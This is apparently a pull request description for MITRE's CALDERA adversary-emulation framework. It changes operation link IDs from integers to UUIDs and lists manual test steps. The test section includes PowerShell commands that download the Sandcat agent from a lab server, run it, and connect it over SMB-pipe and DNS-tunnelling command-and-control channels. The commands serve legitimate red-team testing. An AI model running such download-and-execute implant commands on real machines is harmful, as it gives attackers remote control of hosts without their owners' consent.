mitre/caldera
# VIRTS-1952: Changing Link IDs to UUID

## Description

Change Link IDs to use UUIDs instead of integers.

Plugin fixes:
- https://github.com/mitre/response/pull/68
- https://github.com/mitre/stockpile/pull/522
- https://github.com/mitre/debrief/pull/42
- https://github.com/mitre/gameboard/pull/29

## Type of change


## How Has This Been Tested?

- Running operations
- Viewing link output (including files on disk)
- Cancel / Approve links
- Manual links
- Potential links
- Plugins:
  - Access: Run an ability in Access
  - Gameboard:
    - Log in as red
    - Run "Discovery" adversary
    - Open Gameboard
    - Select operation
    - Note PID for "View admin shares" (first ability)
    - Click "Add external detection", enter:
      - tactic: discovery
      - technique: T1135 | Network Share Discovery
      - pid: PID from gameboard
    - See something like: "Detection successfully added for link in operation: test - 2021-03-23 18:32:52.110373."
  - Debrief: Run an operation. Ensure the output is correct when inspecting a link.
  - Response: `process_elasticsearch_results()` untested.
- Operations with the following agents:
  - Sandcat: with contacts (below)
  - Manx: Using the manx plugin
  - Ragdoll: untested (though python without int parsing)
  - Elasticat: untested (though python without int parsing)
- Contacts:

**Contact: HTTP**

Normal Sandcat deployment.

**Contact: SMB**

Run:

```
$server="http://192.168.80.129:8888";
$url="$server/file/download";
$wc=New-Object System.Net.WebClient;
$wc.Headers.add("platform","windows");
$wc.Headers.add("file","sandcat.go");
$wc.Headers.add("gocat-extensions","proxy_http,proxy_smb_pipe");
$output="C:\Users\Public\sandcat.exe";
$wc.DownloadFile($url,$output);
```

Start two agents:

```
C:\Users\Public\sandcat.exe -server $server -listenP2P -paw http -v
C:\Users\Public\sandcat.exe -server \\127.0.0.1\pipe\agentpipe -c2 SMB -paw smb -v
```

Run an operation.

**Contact: DNS**

(sidenote: this should almost certainly be documented)

Install required go packages on CALDERA server:

```
go get github.com/miekg/dns
```

Run:

```
$server="http://192.168.80.129:8888";
$url="$server/file/download";
$wc=New-Object System.Net.WebClient;
$wc.Headers.add("platform","windows");
$wc.Headers.add("file","sandcat.go");
$wc.Headers.add("gocat-extensions","dns_tunneling");
$output="C:\Users\Public\sandcat_dns.exe";
$wc.DownloadFile($url,$output);
C:\Users\Public\sandcat_dns.exe -server 192.168.80.129:8853 -c2 DnsTunneling -paw dns -v
```

Run an operation.

**Contact: GIST**

Untested.

## Checklist:
